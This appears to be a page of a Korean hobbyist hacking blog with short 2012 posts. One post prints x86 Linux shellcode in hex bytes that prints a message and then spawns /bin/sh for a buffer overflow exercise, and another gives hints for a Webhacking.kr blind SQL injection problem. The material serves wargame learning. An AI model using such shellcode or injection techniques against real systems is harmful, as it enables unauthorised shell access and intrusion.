전체172 버퍼오버플로우공격 시작에앞서.. 쉘코드를 미리만들어놔야하기에..\xeb\x27\x31\xc0\x31\xdb\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x14\xcd\x80\xb0\x0b\x31\xd2\x83\xc1\x15\x89\xcb\x89\x1f\x89\x57\x04\x8d\x0f\xcd\x80\x31\xdb\xb0\x01\xcd\x80\xe8\xd4\xff\xff\xff\x53\x68\x65\x6c\x6c\x20\x66\x6f\x72\x20\x4c\x65\x61\x76\x65\x52\x65\x74\x21\x0a\x20\x2f\x62\x69\x6e\x2f\x73\x68 를 만들어보았다.저렇게 긴이유는.."Shell for LeaveRet!" 이 출력되고난 이후에 쉘을 실행시키는 코드인데..안된다.. buffer에 직접.. 2012. 12. 25. ............?????? 나의 투데이가 대부분 ZeroIRC,Cheatengine을 검색해서 들어온것이라니요......... ㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜ 2012. 12. 24. Webhacking.kr 기념스샷! 전 잘하는게아니에요. 1년이상해서 이정도니 ...ㅜㅜ 그래도 기분좋아서 기념스샷~! 9번은 문제 고장이라고하고 44번은 고장난거같아요 대체어떻게풀어요 ㅜㅜㅜㅜㅜㅜㅜ 48번은 대체뭥미.. 2012. 12. 17. [Webhacking.kr] Problem 2 이 문제.. 시험기간에 감잡았으나 풀진 않았...(공부해야하잖아 안했지만)그리고 이번에 풀게 됬는데.. 인터넷에 OldZombie님이 제공한 힌트로 Bliend sql injectionindex.php 관찰Cookie 관찰등이 있는데요 좀더 포괄적인 힌트로는 information_schema에서 테이블 컬럼명을 뽑아올수없습니다...ㅜㅜGuess...추측을 떄려야합니다. 1.테이블명은 홈페이지어딘가 나와있구요.. 2.컬럼은 추측.3.알집 무작위 대입으로 꺠는것아닙니다.4.쿠키에 따라서 어디가 바뀌는것일까요? 이정도입니다 ^.^ 2012. 12. 16. 이전 1 ··· 30 31 32 33 34 35 36 ··· 43 다음 반응형